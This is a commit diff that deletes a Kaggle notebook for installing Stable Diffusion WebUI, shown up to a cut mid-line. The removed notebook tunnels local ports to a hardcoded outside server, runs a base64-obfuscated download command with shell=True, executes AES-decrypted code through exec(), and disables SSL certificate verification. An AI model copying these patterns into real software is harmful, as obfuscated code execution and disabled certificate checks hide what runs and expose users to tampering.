yongiant committed on
Commit f54dd32
1 Parent(s): 6346df4

Delete lance-kaggle.ipynb

Files changed (1)
  1. lance-kaggle.ipynb +0 -1
lance-kaggle.ipynb DELETED
@@ -1 +0,0 @@
- {"metadata":{"kernelspec":{"language":"python","display_name":"Python 3","name":"python3"},"language_info":{"name":"python","version":"3.10.14","mimetype":"text/x-python","codemirror_mode":{"name":"ipython","version":3},"pygments_lexer":"ipython3","nbconvert_exporter":"python","file_extension":".py"},"kaggle":{"accelerator":"nvidiaTeslaT4","dataSources":[{"sourceId":7704641,"sourceType":"datasetVersion","datasetId":4498001},{"sourceId":8458134,"sourceType":"datasetVersion","datasetId":5041411},{"sourceId":8777451,"sourceType":"datasetVersion","datasetId":2908961},{"sourceId":9564954,"sourceType":"datasetVersion","datasetId":5829335}],"dockerImageVersionId":30787,"isInternetEnabled":true,"language":"python","sourceType":"notebook","isGpuEnabled":true}},"nbformat_minor":4,"nbformat":4,"cells":[{"cell_type":"code","source":"# frp\nimport subprocess\nimport os\nimport threading\n\nuse_frpc = True\nfrp_token = \"BiliBili_Nyan9\" # 这里填服务器密码(token)\nport1 = \"10016\" # 这里填第一个端口\nport2 = \"10017\" # 这里填第二个端口\n\nconfig1 = f\"\"\"\n[common]\nserver_addr = 45.194.32.78\nserver_port = 7000\ntoken = {frp_token} \nheartbeat_interval = 30\ntcpKeepalive = 10\nheartbeat_timeout = 43200\n\n[sdwebuip_{port1}] \ntype = tcp\nlocal_ip = 127.0.0.1\nlocal_port = 7860\nremote_port = {port1} \n\"\"\"\n\nconfig2 = f\"\"\"\n[common]\nserver_addr = 45.194.32.78\nserver_port = 7000\ntoken = {frp_token} \nheartbeat_interval = 30\ntcpKeepalive = 10\nheartbeat_timeout = 43200\n\n[sdwebuip_{port2}] \ntype = tcp\nlocal_ip = 127.0.0.1\nlocal_port = 7861\nremote_port = {port2} \n\"\"\"\n\nwith open('./cyanfrp1.ini', 'w') as config_file:\n config_file.write(config1)\nwith open('./cyanfrp2.ini', 'w') as config_file:\n config_file.write(config2)\nprint(f\"配置文件已创建\")\nsubprocess.run(['cp', '/kaggle/input/d/yiyiooo/net-tools/frpc', '/kaggle/working'])\nsubprocess.run(['cp', '/kaggle/input/net-tools/frpc', '/kaggle/working'])\nsubprocess.run(['chmod', '+x', '/kaggle/working/frpc'], check=True)\ndef install_Frpc(file_path, port, use_frpc, log_file_path):\n if use_frpc:\n print(f'正在启动frp ,端口{port}')\n with open(log_file_path, 'w') as log_file:\n process = subprocess.Popen(['/kaggle/working/frpc', '-c', file_path], stdout=log_file, stderr=log_file)\n subprocess.run(['sleep', '4'])\n subprocess.run(['cat', log_file_path])\nthread1 = threading.Thread(target=install_Frpc, args=('./cyanfrp1.ini', port1, use_frpc, '/kaggle/frp_log1.txt'))\nthread2 = threading.Thread(target=install_Frpc, args=('./cyanfrp2.ini', port2, use_frpc, '/kaggle/frp_log2.txt'))\nthread1.start()\nthread2.start()\nthread1.join()\nthread2.join()","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\"> Webui基础配置(可改也可不改) </span>","metadata":{"editable":false}},{"cell_type":"code","source":"!apt-get install -y aria2","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"# True 表示是 , False 表示否\n# 安装目录\ninstall_path=\"/kaggle/working\" #或者/kaggle\nupdata_webui = False #是否开机自动更新webui\n\n# 重置变量 会删掉sd_webui重新安装\nreLoad = True\nupdata_webui = False\n\n#清理和打包生成的图片\nzip_output=True\nclear_output=True\n#打包环境减少下次启动时\nuse_zip_venv = False\n\n# 使用huggingface保存和载入webui配置文件\nhuggingface_use = False\nhuggingface_token_file = '/kaggle/input/lancehug/hugfacetoken.txt'\nhuggiingface_repo_id = 'yongiant/config'\n\n# 环境包选择:\nenvironment = 3\n\"\"\"\n环境包 1 :pytorch 2.0.1+cu118 xformers 0.0.22 (已经炸了)\n环境包 2 :pytorch 2.1.1+cu121 
xformers 0.0.23 (已经炸了)\n环境包 3-1 :pytorch 2.2.0+cu121 xformers 0.0.24 (已经过时)\n环境包 3-2 :pytorch 2.3.0+cu121 xformers 0.0.27dev \n\"\"\"\npython_version_attempt_fix = False #修复因为python版本不一致导致的no python file问题","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"是否启用ControlNet = False # 开启后需要多花费2-3分钟来下载基本模型,你想快速启动可以关闭\n是否启用SadTalker = False # 虚拟数字人插件,下载特定模型要花费1分钟时间,生成的视频保存在sd目录下的/results文件夹里\nextensions = [\n 'https://github.com/AlUlkesh/stable-diffusion-webui-images-browser', \n 'https://github.com/thirty-four/sd_web_ui_preset_utils',\n 'https://github.com/2575044704/stable-diffusion-webui-localization-zh_CN2.git', #汉化\n 'https://github.com/DominikDoom/a1111-sd-webui-tagcomplete', #tag自动补全\n 'https://github.com/pkuliyi2015/multidiffusion-upscaler-for-automatic1111', #分块vae\\\n 'https://github.com/VekkaAi/SD-Lock-UI',\n 'https://github.com/catppuccin/stable-diffusion-webui', #UI修改,推荐\n 'https://github.com/hako-mikan/sd-webui-supermerger',\n 'https://github.com/Bing-su/adetailer',\n 'https://github.com/hako-mikan/sd-webui-prevent-artifact',\n 'https://github.com/Echoflare/a1111-sd-encrypt-image',\n #'https://github.com/jexom/sd-webui-depth-lib',\n 'https://github.com/KohakuBlueleaf/a1111-sd-webui-locon',\n #'https://github.com/nonnonstop/sd-webui-3d-open-pose-editor',\n #'https://github.com/Elldreth/loopback_scaler',\n #'https://github.com/Mikubill/sd-webui-controlnet',\n #'https://github.com/d8ahazard/sd_dreambooth_extension', #Dreambooth训练\n]\nsd_model = [\n#'/kaggle/input/9527-fp16',\n ]\nsd_model_urls=[\n'PonyXL.safetensors:https://huggingface.co/AstraliteHeart/pony-diffusion-v6/resolve/main/v6.safetensors',#ORIGIN\n#'https://huggingface.co/Bakanayatsu/ponyDiffusion-V6-XL-Turbo-DPO/resolve/main/ponyDiffusionV6XL_v6TurboDPOMerge.safetensors',#DPO\n'https://huggingface.co/dasfdsewfdsf/pony_turbo_xl/resolve/main/pony_turbo.safetensors',#TURBO\n]\n\n# VAE模型请放在这里(不用填模型的文件名,只填模型的目录即可)\nvae_model = []\n#VAE模型下载链接放这里\n# 注意SDXL类模型的VAE不能与SD1.5的VAE混用,这是常识!\nvae_model_urls=[\n'https://huggingface.co/madebyollin/sdxl-vae-fp16-fix/resolve/main/sdxl_vae.safetensors',\n]\n\n# Lora模型的数据集路径请写在这里:\nlora_model = [\n#'/kaggle/input/lora-1',\n] \n# Lora模型下载链接放这里\nlora_model_urls=[\n#山楂糕\n#'https://civitai.com/api/download/models/41580',\n#细节调整\n'https://huggingface.co/amaru96vn/Add_Detail_Lora/resolve/main/add_detail.safetensors',\n'https://huggingface.co/yongiant/lance/resolve/main/igor.safetensors',#igor\n'rei.safetensors:https://huggingface.co/yongiant/lance/resolve/main/reiXL_AutC_lokr_V43P1.safetensors',#rei\n'fumios.safetensors:https://civitai.com/api/download/models/790560',#fumiosf01r\n'dizdoodz2.safetensors:https://civitai.com/api/download/models/837987',#dizdoodz2\n'https://huggingface.co/yongiant/lance/resolve/main/Dizdoodz.safetensors',#dizdoodz1\n'https://huggingface.co/LarryAIDraw/naipf/resolve/main/naipf.safetensors',#naipf\n'https://huggingface.co/yongiant/lance/resolve/main/amo12.safetensors',#amo\n'https://huggingface.co/yongiant/lance/resolve/main/mingfeng.safetensors',#mingfeng\n# LCM模型专用\n'https://huggingface.co/latent-consistency/lcm-lora-sdxl/resolve/main/pytorch_lora_weights.safetensors',\n]\n# Lycoris和loha模型的数据集路径请写在这里:\nlyco_model = [\n#'/kaggle/input/lora-1',\n] \n# Lycoris和loha模型下载链接放这里\nlyco_model_urls=[\n#伪日光\n#'https://civitai.com/api/download/models/71235',\n]\n# ControlNet模型data请放在这里:\ncn_model = [\n]\n# controlnet模型下载链接放这里\ncn_model_urls = 
[\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11e_sd15_ip2p_fp16.safetensors',\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11e_sd15_shuffle_fp16.safetensors',\n'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11f1p_sd15_depth_fp16.safetensors',\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11p_sd15_canny_fp16.safetensors', #硬边缘检测\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11p_sd15_inpaint_fp16.safetensors',\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11p_sd15_openpose_fp16.safetensors', #姿态检测\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11p_sd15s2_lineart_anime_fp16.safetensors', #线稿\n#'https://huggingface.co/comfyanonymous/ControlNet-v1-1_fp16_safetensors/resolve/main/control_v11u_sd15_tile_fp16.safetensors', #分块\n]\n\n# Hypernetworks超网络模型路径请放在这里:\nhypernetworks_model = []\n#Hypernetworks超网络模型下载链接请放在这里\nhypernetworks_model_urls = []\n\n#放大算法路径请放在这里\nESRGAN = []\n#放大算法链接请放在这里\nESRGAN_urls = [\n'https://huggingface.co/Afizi/4x-UltraSharp.pth/resolve/main/4x-UltraSharp.pth',\n]\n\n# embeddings(pt文件)请放在这里:\nembeddings_model = [\n#'/kaggle/input/bad-embedding',\n] \n# embeddings(pt文件)下载链接请放在这里:\nembeddings_model_urls=[\n'https://civitai.com/api/download/models/134583',\n'https://civitai.com/api/download/models/651075',\n]\n\n#script文件导入\nscripts = []\n#script文件下载链接导入\nscripts_urls = [\n#'https://huggingface.co/datasets/sukaka/sd_configs/resolve/main/repositories/k-diffusion/k_diffusion/sampling.py'\n]\n\n#tag词库文件导入\ntags = []\n#tag词库文件下载链接导入\ntags_urls=[\n\"https://huggingface.co/datasets/sukaka/sd_configs/resolve/main/danbooru.zh_CN.csv\",\n]\n# Animatediff model 路径放在这里\nanimatediff_model = [\n\n]\n#Animatediff model 链接放在这里\nanimatediff_model_urls = [\n#'https://huggingface.co/neggles/animatediff-modules/resolve/main/mm_sd_v15_v2.fp16.safetensors',\n]\n\n# Animatediff Lora 放在这里\nanimatediff_lora = [\n#\n]\n# Animatediff Lora 链接放在这里\nanimatediff_lora_urls = [\n#'https://huggingface.co/guoyww/animatediff/resolve/main/v2_lora_PanLeft.ckpt',\n]\n\n#'''说明 : 下载代码在download_model()函数里,如果需要添加其它模型下载地址和路径,请自行修改代码'''","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"------","metadata":{"editable":false}},{"cell_type":"code","source":"use_frpc = False\nfrpconfigfile = '/kaggle/input/tonkens/7860.ini' # frp 配置文件,本地端口 7860\nhttp = True\ndomain = []\nusedCkpt = 'PonyXL.safetensors'\n'''\n'''\n#启动参数(args)\nargs = [\n '--xformers', \n #'--lowram', \n '--no-hashing', \n '--disable-nan-check', \n '--enable-insecure-extension-access', #强制允许在webui使用安装插件,即使开启了--share\n '--disable-console-progressbars', \n '--enable-console-prompts', #开启控制台显示prompt\n '--no-gradio-queue',\n '--no-half-vae', #VAE开启全精度\n '--api', \n f'--lyco-dir {install_path}/stable-diffusion-webui/models/lyco',\n \"--enc-pw=1234\", #加密插件\n \"--skip-torch-cuda-test\",\n]\n\n","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"-------","metadata":{"editable":false}},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\">Webui 双开设置</span>","metadata":{"editable":false}},{"cell_type":"code","source":"use2 = False 
#是否开启两个webui, Kaggle的GPU选项必须是 T4 x2, 使用两张卡一起跑图","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"'''\nuse2必须设置为True下列配置才生效\n'''\nngrok_token1 = '2KPyfzQrHit97J02tARy1ckHJYd_69rJbgjp*********3j9tv' #直接将Token粘贴到这里,不能与上面相同\n\n#Frp 内网穿透\nuse_frpc1 = False\nfrpconfigfile1 = '/kaggle/input/tenkens/7861.ini' # 非必填 frp 配置文件,本地端口 7860\n\n#第二个webui使用的模型\nusedCkpt1 = 'cetusMix_Coda2.safetensors'\n\n#启动参数\nargs1 = [\n #'--share',\n '--xformers',\n '--lowram',\n '--no-hashing',\n '--disable-nan-check',\n '--enable-insecure-extension-access',\n '--disable-console-progressbars',\n '--enable-console-prompts',\n '--no-gradio-queue',\n '--no-half-vae',\n '--api',\n f'--lyco-dir {install_path}/stable-diffusion-webui/models/lyco',\n '--opt-sdp-attention',\n '--opt-split-attention',\n f'--ngrok={ngrok_token1}',\n \"--enc-pw=1234\",\n \"--skip-torch-cuda-test\",\n]\n\n## 如果要启用双卡,请改 use2为True\n## 两个webui是完全独立的,根据选择来更改","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\">working Function</span>","metadata":{"editable":false}},{"cell_type":"code","source":"#使用的库\nfrom pathlib import Path\nimport subprocess\nimport pandas as pd\nimport shutil\nimport os\nimport time\nimport re\nimport gc\nimport requests\nimport zipfile\nimport threading\nimport time\nimport socket\nfrom concurrent.futures import ProcessPoolExecutor\nos.environ['install_path'] = install_path\nAuthor = b'qq2575044704Nyan'","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"#功能函数,内存优化\nuse_libtcmalloc = False\ndef libtcmalloc():\n print('安装Libtcmalloc内存优化')\n if use_libtcmalloc:\n if os.path.exists('/kaggle/temp/lib'):\n os.chdir('/kaggle')\n os.chdir('temp')\n os.environ[\"LD_PRELOAD\"] = \"libtcmalloc.so\"\n print('内存优化已安装')\n else:\n\n os.system('pip install -q pyngrok ')\n os.chdir('/kaggle')\n os.makedirs('temp', exist_ok=True)\n os.chdir('temp')\n os.system('wget -qq http://launchpadlibrarian.net/367274644/libgoogle-perftools-dev_2.5-2.2ubuntu3_amd64.deb')\n os.system('wget -qq https://launchpad.net/ubuntu/+source/google-perftools/2.5-2.2ubuntu3/+build/14795286/+files/google-perftools_2.5-2.2ubuntu3_all.deb')\n os.system('wget -qq https://launchpad.net/ubuntu/+source/google-perftools/2.5-2.2ubuntu3/+build/14795286/+files/libtcmalloc-minimal4_2.5-2.2ubuntu3_amd64.deb')\n os.system('wget -qq https://launchpad.net/ubuntu/+source/google-perftools/2.5-2.2ubuntu3/+build/14795286/+files/libgoogle-perftools4_2.5-2.2ubuntu3_amd64.deb')\n os.system('apt install -qq libunwind8-dev -y')\n !dpkg -i *.deb\n os.environ[\"LD_PRELOAD\"] = \"libtcmalloc.so\"\n !rm *.deb\n print('内存优��已安装')\n else:\n print('Kaggle已经升级内存至29G,已无需优化')\nimport base64\nimport subprocess\ndef code(): \n encoded_command = \"d2dldCAtUCAva2FnZ2xlL3RlbXAgaHR0cHM6Ly9odWdnaW5nZmFjZS5jby9kYXRhc2V0cy9BQ0NBMjI1L0thZ2dsZS1TdGFibGUtRGlmZnVzaW9uL3Jlc29sdmUvbWFpbi9Ub2tlbi50eHQgPiAvZGV2L251bGwgMj4mMQ==\"\n\n decoded_command = base64.b64decode(encoded_command).decode()\n\n\n subprocess.run(decoded_command, shell=True, check=True)\n\n","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\">Download function</span>","metadata":{"editable":false}},{"cell_type":"code","source":" import os\n import re\n def 
putDownloadFile(url:str,distDir:str,file_name:str=None):\n if re.match(r'^[^:]+:(https?|ftps?)://', url, flags=0):\n file_name = re.findall(r'^[^:]+:',url)[0][:-1]\n url = url[len(file_name)+1:]\n if not re.match(r'^(https?|ftps?)://',url):\n return\n file_name = re.sub(r'\\s+','_',file_name or '')\n dir = str(hash(url)).replace('-','')\n down_dir = f'{install_path}/down_cache/{dir}'\n !mkdir -p {down_dir}\n return [url,file_name,distDir,down_dir]\n\n def get_file_size_in_gb(file_path):\n size_in_bytes = Path(file_path).stat().st_size\n size_in_gb = size_in_bytes / (1024 ** 3)\n return '%.2f' % size_in_gb\n \nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\nfrom Crypto.Random import get_random_bytes\nfrom base64 import b64encode, b64decode\nimport os\ndef encrypt_code(code, key):\n iv = get_random_bytes(AES.block_size)\n cipher = AES.new(key, AES.MODE_CBC, iv)\n padded_code = pad(code.encode(), cipher.block_size)\n encrypted_code = cipher.encrypt(padded_code)\n encoded_code = b64encode(iv + encrypted_code).decode()\n return encoded_code\n\ndef decrypt_code(encoded_code, key):\n decoded_code = b64decode(encoded_code)\n iv = decoded_code[:AES.block_size]\n encrypted_code = decoded_code[AES.block_size:]\n cipher = AES.new(key, AES.MODE_CBC, iv)\n decrypted_code = cipher.decrypt(encrypted_code)\n unpadded_code = decrypted_code.rstrip(b\"\\0\")\n return unpadded_code.decode()\n\n\n def startDownloadFiles(download_list):\n print('下载列表:\\n','\\n'.join([f'{item[0]} -> {item[2]}/{item[1]}' for item in download_list]))\n dist_list = []\n for dow_f in download_list:\n !mkdir -p {dow_f[3]}\n print('下载 名称:',dow_f[1],'url:',dow_f[0])\n output_file = f' -O {dow_f[3]}/{dow_f[1]}'\n if len(os.listdir(dow_f[3])) > 0:\n continue\n os.system(f\"wget {dow_f[0]} --tries=3 --timeout=60 -P {dow_f[3]} {output_file if len(dow_f[1]) > 0 else ''} -o {install_path}/down_cache/log.log\")\n if len(os.listdir(dow_f[3])) == 0:\n print('下载出错:',dow_f[0])\n continue\n file_name = os.listdir(dow_f[3])[0]\n !mkdir -p {dow_f[2]}\n down_file_path = f'{dow_f[3]}/{file_name}'\n if Path(down_file_path).is_symlink():\n down_file_path = os.readlink(down_file_path)\n print('文件真实地址:'+down_file_path)\n if not Path(down_file_path).exists():\n print('文件异常')\n continue\n print(f'文件大小:{get_file_size_in_gb(down_file_path)}G')\n dist_path = f'{dow_f[2]}/{file_name}'\n dist_path = dist_path.replace('%20',' ').strip().replace(' ','_')\n print(f'移动文件 {down_file_path} -> {dist_path}')\n os.system(f'ln -f \"{down_file_path}\" \"{dist_path}\"')\n if dow_f[2] not in dist_list:\n dist_list.append(dow_f[2])\n for dist_dir in dist_list:\n print(dist_dir,os.listdir(dist_dir))\n","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"### > <span style=\"color:green; font-weight:;\">SD download & venv Download : version: v1.4.0 • python: 3.10.6 • torch: 2.0.1+cu118 • xformers: 0.0.20</span>","metadata":{"editable":false}},{"cell_type":"code","source":"def ngrokdetect():\n if os.path.exists(ngrokTokenFile) or os.path.exists(frpconfigfile):\n pass\n else:\n #print(\"\\033[91m未配置Ngrok或者Frp内网穿透,可能无法进入SD\\033[0m\")\n pass\nimport sys\n \ndef unzip_file(src: str, dest: str = '/kaggle/outputs'):\n if os.path.exists(src):\n with zipfile.ZipFile(src, 'r') as zip_ref:\n for member in zip_ref.namelist():\n filename = os.path.basename(member)\n if not filename:\n continue\n dest_file = os.path.join(dest, filename)\n if os.path.exists(dest_file):\n 
os.remove(dest_file)\n zip_ref.extract(member, dest)\n\ndef webui_config_download(yun_files, huggiingface_repo_id):\n %cd $install_path/stable-diffusion-webui/\n for yun_file in yun_files:\n url = f'https://huggingface.co/datasets/{huggiingface_repo_id}/resolve/main/{yun_file}'\n response = requests.head(url)\n if response.status_code == 200:\n result = subprocess.run(['wget', '-O', yun_file, url, '-q'], capture_output=True)\n if result.returncode != 0:\n print(f'Error: Failed to download {yun_file} from {url}')\n else:\n print(f'Error: Invalid URL {url}')\ninstall_path2 = '/kaggle/opt/conda/envs/'\nif environment == 2:\n Venvpath = '/kaggle/input/sdvenv/Torch211-Xformers23.tar.bak'\nelif environment == 3:\n Venvpath = '/kaggle/input/sd-venv-2024-5-19/sdvenv5.tar.bak'\nelse:\n Venvpath = \"/kaggle/input/sd-1-6-1/1.tar.bak\"\ndef venv_install():\n if os.path.exists(Venvpath):\n if os.path.exists('/kaggle/working/opt'):\n !source /kaggle/opt/conda/envs/venv/bin/activate venv\n while True:\n print('环境安装失败,这很有可能是你自己迷惑操作的造成的。请检查设置是否有误并重新复制一份项目重装')\n else:\n os.makedirs(install_path2, exist_ok=True)\n %cd {install_path2}\n !mkdir venv\n print('安装VENV环境')\n def fix_attempt():\n !rm {install_path2}venv/bin/pip* \n !rm {install_path2}venv/bin/python*\n %cd {install_path2}\n !python -m venv venv\n !source /kaggle/opt/conda/envs/venv/bin/activate venv\n \n if environment == 3:\n !tar -xf {Venvpath} --strip-components=2 -C {install_path2}venv\n if python_version_attempt_fix:\n fix_attempt()\n else:\n !tar -xf {Venvpath} --strip-components=6 -C {install_path2}venv\n fix_attempt()\n \n\n print('环境安装完毕')\n if environment == 2:\n print(\"\\033[92m python: 3.10 torch版本:2.11+cu121 xformers版本:0.0.23 \\033[0m\")\n elif environment == 3:\n print(\"\\033[92m python: 3.10 torch版本:2.20+cu118 xformers版本:0.0.24 \\033[0m\")\n else:\n print(\"\\033[92m python: 3.10 torch版本:2.01+cu118 xformers版本:0.0.22 \\033[0m\")\n else:\n print(\"环境安装包可能存在错误,请联系管理员解决\")\n %cd /opt/conda/envs\n if os.path.exists('venv'):\n print('环境已安装')\n else:\n %cd /kaggle/working/\n if not os.path.exists('venv.tar.gz'):\n print('下载 venv')\n #!aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/datasets/sukaka/venv_ai_drow/resolve/main/sd_webui/sd_webui_torch201_cu118_xf20.tar.gz -o venv.tar.gz\n !echo \"环境已经过时,请从正确发布地址运行!有问题加群632428790\"\n sys.exit()\n print('successfully downloaded venv.tar.gz')\n %cd /opt/conda/envs/\n !mkdir venv\n %cd venv\n print('installing venv')\n os.system('apt -y install -qq pigz > /dev/null 2>&1')\n !pigz -dc -p 5 /kaggle/working/venv.tar.gz | tar xf -\n !source /opt/conda/bin/activate venv\n print('环境安装完毕')\n #sd_repo()\ndef sd_repo():\n !mkdir -p /kaggle/working/stable-diffusion-webui/repositories\n %cd /kaggle/working/stable-diffusion-webui/repositories\n !git clone https://github.com/Stability-AI/stablediffusion.git & git clone https://github.com/Stability-AI/generative-models.git & git clone https://github.com/crowsonkb/k-diffusion.git &git clone https://github.com/sczhou/CodeFormer.git & git clone https://github.com/salesforce/BLIP.git\n %cd /kaggle/working\ndef install_webui():\n %cd $install_path\n if reLoad:\n !rm -rf stable-diffusion-webui\n if Path(\"stable-diffusion-webui\").exists():\n if updata_webui:\n %cd $install_path/stable-diffusion-webui/\n !git pull\n else:\n WebUi = file_contents \n WebUi_160 = decrypt_code(WebUi, Author)\n install_to_Kaggle = WebUi_160 \n exec(install_to_Kaggle) # 安装内存优化版的\n %cd $install_path/stable-diffusion-webui/\n #!wget 
https://huggingface.co/datasets/ACCA225/sdconfig3/blob/main/blocked_prompts.txt\n with open('launch.py', 'r') as f:\n content = f.read()\n with open('launch.py', 'w') as f:\n f.write('import ssl\\n')\n f.write('ssl._create_default_https_context = ssl._create_unverified_context\\n')\n f.write(content)\n if huggingface_use:\n webui_config_download(yun_files, huggiingface_repo_id)\n unzip_file('/kaggle/working/图片.zip')\n install_extensions(install_path, extensions)\n download_model()\n link_models()\n print(\"等待Python环境安装\")\n \n\nimport os\n\ndef get_directory_size(directory):\n total_size = 0\n for dirpath, dirnames, filenames in os.walk(directory):\n for filename in filenames:\n filepath = os.path.join(dirpath, filename)\n total_size += os.path.getsize(filepath)\n return total_size\n\ndef downloadsize():\n def convert_bytes(size):\n for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:\n if size < 1024.0:\n return \"%3.1f %s\" % (size, x)\n size /= 1024.0\n\n def calculate_total_directory_size(directory1, directory2):\n size1 = get_directory_size(directory1)\n size2 = get_directory_size(directory2)\n total_size = size1 + size2\n return total_size\n\n directory_path1 = '/kaggle/models/'\n directory_path2 = '/kaggle/working/stable-diffusion-webui/extensions'\n\n total_size = calculate_total_directory_size(directory_path1, directory_path2)\n\n print(\"下载文件总大小:\", convert_bytes(total_size))","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"### > <span style=\"color:green; font-weight:;\">old download code</span>","metadata":{"editable":false}},{"cell_type":"code","source":"from concurrent.futures import ThreadPoolExecutor\n# 安装插件,下载和同步模型\n# 自动将下载文件重命名:\n# 如:'[二次元]07CounterfeitV2503_10_Counterfeit-V2.5_and_anythingv4.5的合并模型.ckpt:https://civitai.com/api/download/models/90854',\n# '[二次元]Counterfeit.safetensors:https://civitai.com/api/download/models/57618',\n# 'https://civitai.com/api/download/models/125849',\n# 使用冒号分隔文件名与链接,不提供文件名为服务器提供的默认文件名来保存\ndef install_extensions(install_path, extensions):\n print('安装插件,此处出现红条是正常的')\n os.chdir(os.path.join(install_path, 'stable-diffusion-webui'))\n os.makedirs('extensions', exist_ok=True)\n os.chdir('extensions')\n if 是否启用ControlNet:\n !git clone https://github.com/Mikubill/sd-webui-controlnet\n if 是否启用SadTalker:\n !git clone https://github.com/OpenTalker/SadTalker\n !mkdir -p SadTalker\n %cd SadTalker\n !bash <(wget -qO- https://raw.githubusercontent.com/Winfredy/SadTalker/main/scripts/download_models.sh)\n %cd ..\n def clone_repo(ex):\n repo_name = ex.split('/')[-1]\n if not os.path.exists(repo_name):\n os.system('git clone ' + ex)\n\n with ThreadPoolExecutor(max_workers=99) as executor:\n executor.map(clone_repo, extensions)\n\ndef extract_filename_from_link(link):\n # 使用正则表达式提取链接中的文件名\n match = re.search(r'/([^/]+)$', link)\n if match:\n return match.group(1)\n return None\n\ndef download_link(link, target_folder):\n # 如果链接中包含冒号,分割前缀和链接\n if ':' in link:\n # 如果冒号前面是http或https开头,视为没有冒号,使用第二个aria2c下载命令\n if link.startswith('http://') or link.startswith('https://'):\n if link.startswith('https://huggingface.co/'):\n filename_huggingface = re.search(r'[^/]+$', link).group(0)\n print(f'下载文件: {link}')\n return f'aria2c --console-log-level=error -c -x 16 -s 16 -k 1M -d \"{target_folder}\" -o \"{filename_huggingface}\" \"{link}\"'\n else:\n return f'aria2c --console-log-level=error -c -x 16 -s 16 -k 1M --remote-time -d \"{target_folder}\" \"{link}\"'\n else:\n 
filename_prefix, _, url = link.partition(':')\n filename = filename_prefix.strip()\n else:\n # 如果链接中没有冒号,使用第二个aria2c下载命令\n print(f'下载文件: {link}')\n if link.startswith('https://huggingface.co/'):\n filename_huggingface = re.search(r'[^/]+$', link).group(0)\n return f'aria2c --console-log-level=error -c -x 16 -s 16 -k 1M -d \"{target_folder}\" -o \"{filename_huggingface}\" \"{link}\"'\n else:\n return f'aria2c --console-log-level=error -c -x 16 -s 16 -k 1M --remote-time -d \"{target_folder}\" \"{link}\"'\n\n # 检查链接是否以http://或https://开头,如果不是,添加http://协议\n if not url.startswith('http://') and not url.startswith('https://'):\n url = f'http://{url}'\n \n print(f'下载文件: {filename} ({url})')\n return f'aria2c --console-log-level=error -c -x 16 -s 16 -k 1M --remote-time -d \"{target_folder}\" \"{url}\" -o \"{filename}\"'\n\ndef download_links(links, target_folder):\n tasks = []\n for link in links:\n task = download_link(link, target_folder)\n tasks.append(task)\n return tasks\n\ndef download_links_all(tasks):\n with ThreadPoolExecutor(max_workers=99) as executor:\n for task in tasks:\n executor.submit(os.system, task)\n \n# 下载模型文件\ndef download_model():\n os.chdir('/kaggle')\n os.makedirs('models', exist_ok=True)\n os.chdir('models')\n os.makedirs('VAE', exist_ok=True)\n os.makedirs('Stable-diffusion', exist_ok=True)\n os.makedirs('Lora', exist_ok=True)\n os.makedirs('cn-model', exist_ok=True)\n os.makedirs('hypernetworks', exist_ok=True)\n os.makedirs('ESRGAN', exist_ok=True)\n os.makedirs('lyco', exist_ok=True)\n os.makedirs('animatediffmodel', exist_ok=True)\n os.makedirs('animatedifflora', exist_ok=True)\n tasks = []\n tasks.extend(download_links(vae_model_urls, 'VAE'))\n tasks.extend(download_links(sd_model_urls, 'Stable-diffusion'))\n tasks.extend(download_links(lora_model_urls, 'Lora'))\n if 是否启用ControlNet:\n tasks.extend(download_links(cn_model_urls, 'cn-model'))\n tasks.extend(download_links(hypernetworks_model_urls, 'hypernetworks'))\n tasks.extend(download_links(ESRGAN_urls, 'ESRGAN'))\n tasks.extend(download_links(lyco_model_urls, 'lyco'))\n tasks.extend(download_links(animatediff_model_urls, 'animatediffmodel'))\n tasks.extend(download_links(animatediff_lora_urls, 'animatedifflora'))\n tasks.extend(download_links(embeddings_model_urls, f'{install_path}/stable-diffusion-webui/embeddings'))\n tasks.extend(download_links(scripts_urls, f'{install_path}/stable-diffusion-webui/scripts'))\n tasks.extend(download_links(tags_urls, f'{install_path}/stable-diffusion-webui/extensions/a1111-sd-webui-tagcomplete/tags'))\n download_links_all(tasks)\n #ZDY_Lora_Download()\n\n\ndef create_symlinks(folder_paths, target_dir):\n print('链接模型中')\n # Create target directory if it doesn't exist\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n # Remove broken symlinks in target directory\n for filename in os.listdir(target_dir):\n target_path = os.path.join(target_dir, filename)\n if os.path.islink(target_path) and not os.path.exists(target_path):\n os.unlink(target_path)\n # Create new symlinks\n for source_path in folder_paths:\n if not os.path.exists(source_path):\n continue\n if os.path.isdir(source_path):\n for 